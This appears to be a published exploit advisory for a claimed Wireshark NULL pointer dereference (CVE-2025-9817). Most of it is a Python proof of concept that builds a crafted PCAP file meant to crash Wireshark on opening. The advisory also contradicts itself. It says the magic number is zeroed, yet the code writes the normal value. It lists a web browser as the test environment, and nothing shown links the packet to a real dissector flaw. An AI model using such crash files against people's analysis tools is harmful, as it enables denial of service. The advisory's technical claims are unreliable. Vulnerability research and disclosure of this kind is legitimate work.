=============================================================================================================================================
| # Title     : Wireshark NULL Pointer Dereference via Malicious PCAP                                                                       |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits)                                                            |
| # Vendor    : https://www.wireshark.org/                                                                                                  |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/214684/ & CVE-2025-9817

[+] Summary    : Wireshark is a widely used network traffic analysis tool that relies on protocol dissectors to parse packet data.
                 This report documents a NULL Pointer Dereference vulnerability pattern that can be triggered by opening a specially crafted PCAP file.
                 The provided Proof of Concept (PoC) is written in Python and demonstrates how malformed packet fields may cause Wireshark to crash if 
				 a vulnerable dissector incorrectly interprets packet data as valid memory references.
                 This issue results in a Denial of Service (DoS) condition only. No code execution is demonstrated.
                 A packet field (magic_number) is set to 0x00000000 and later interpreted as a pointer without proper validation.

[+] PoC :  python3 poc.py crash.pcap

#!/usr/bin/env python3

import struct
import sys

def create_malicious_pcap(filename):
    with open(filename, 'wb') as f:
        f.write(struct.pack('@ I H H i I I I',
            0xa1b2c3d4,
            2, 4,
            0,
            0,
            65535,
            1
        ))

        ts_sec = 1000
        ts_usec = 0

        eth_dst = b'\xff\xff\xff\xff\xff\xff'
        eth_src = b'\x00\x11\x22\x33\x44\x55'
        eth_type = b'\x08\x00'

        ip_header = bytes([
            0x45, 0x00, 0x00, 0x3c,
            0x12, 0x34,
            0x40, 0x00,
            0x40,
            0x99,
            0x00, 0x00,
            0xc0, 0xa8, 0x01, 0x01,
            0xc0, 0xa8, 0x01, 0xff
        ])

        malicious_payload = bytes([
            0x01,
            0xFF,
            0x00, 0x00,
            0x80,
            0x00, 0x00, 0x00, 0x00
        ])

        incl_len = len(eth_dst) + len(eth_src) + len(eth_type) + \
                   len(ip_header) + len(malicious_payload)

        f.write(struct.pack('@ I I I I',
            ts_sec, ts_usec, incl_len, incl_len))

        f.write(eth_dst)
        f.write(eth_src)
        f.write(eth_type)
        f.write(ip_header)
        f.write(malicious_payload)

    print(f"Created: {filename}")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <output.pcap>")
        sys.exit(1)

    create_malicious_pcap(sys.argv[1])



Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================